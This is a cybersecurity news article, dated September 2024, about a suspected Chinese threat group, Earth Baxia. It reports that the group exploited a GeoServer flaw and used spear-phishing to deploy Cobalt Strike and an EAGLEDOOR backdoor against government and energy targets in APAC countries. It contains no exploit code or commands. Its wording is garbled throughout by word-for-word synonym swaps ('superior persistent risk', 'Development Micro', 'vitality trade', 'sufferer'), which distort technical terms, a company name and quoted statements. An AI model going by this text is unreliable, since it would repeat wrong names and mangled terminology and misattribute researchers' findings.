Chinese language Hackers Exploit GeoServer Flaw to Goal APAC Nations with EAGLEDOOR Malware

Sep 23, 2024Ravie LakshmananCyber Espionage / Malware

A suspected superior persistent risk (APT) originating from China focused a authorities group in Taiwan, and presumably different international locations within the Asia-Pacific (APAC) area, by exploiting a not too long ago patched essential safety flaw impacting OSGeo GeoServer GeoTools.

The intrusion exercise, which was detected by Development Micro in July 2024, has been attributed to a risk actor dubbed Earth Baxia.

“Primarily based on the collected phishing emails, decoy paperwork, and observations from incidents, it seems that the targets are primarily authorities companies, telecommunication companies, and the vitality trade within the Philippines, South Korea, Vietnam, Taiwan, and Thailand,” researchers Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, and Philip Chen said.

The invention of lure paperwork in Simplified Chinese language factors to China being one of many affected international locations as effectively, though the cybersecurity firm stated it doesn’t have sufficient info to find out what sectors throughout the nation have been singled out.

The multi-stage an infection chain course of leverages two completely different strategies, utilizing spear-phishing emails and the exploitation of the GeoServer flaw (CVE-2024-36401, CVSS rating: 9.8), to finally ship Cobalt Strike and a beforehand unknown backdoor codenamed EAGLEDOOR, which permits for info gathering and payload supply.

“The risk actor employs GrimResource and AppDomainManager injection to deploy extra payloads, aiming to decrease the sufferer’s guard,” the researchers famous, including the previous technique is used to obtain next-stage malware by way of a decoy MSC file dubbed RIPCOY embedded inside a ZIP archive attachment.

It is price mentioning right here that Japanese cybersecurity firm NTT Safety Holdings not too long ago detailed an exercise cluster with hyperlinks to APT41 that it stated used the identical two strategies to focus on Taiwan, the Philippines army, and Vietnamese vitality organizations.

It is doubtless that these two intrusion units are associated, given the overlapping use of Cobalt Strike command-and-control (C2) domains that mimic Amazon Net Providers, Microsoft Azure (e.g., “s3cloud-azure,” “s2cloud-amazon,” “s3bucket-azure,” and “s3cloud-azure”), and Development Micro itself (“trendmicrotech”).

The top purpose of the assaults is to deploy a customized variant of Cobalt Strike, which acts as a launchpad for the EAGLEDOOR backdoor (“Eagle.dll”) by way of DLL side-loading.

The malware helps 4 strategies to speak with the C2 server over DNS, HTTP, TCP, and Telegram. Whereas the primary three protocols are used to transmit the sufferer standing, the core performance is realized by way of the Telegram Bot API to add and obtain recordsdata, and execute extra payloads. The harvested knowledge is exfiltrated by way of curl.exe.

“Earth Baxia, doubtless based mostly in China, performed a classy marketing campaign focusing on authorities and vitality sectors in a number of APAC international locations,” the researchers identified.

“They used superior strategies like GeoServer exploitation, spear-phishing, and customised malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate knowledge. Using public cloud providers for internet hosting malicious recordsdata and the multi-protocol assist of EAGLEDOOR spotlight the complexity and flexibility of their operations.”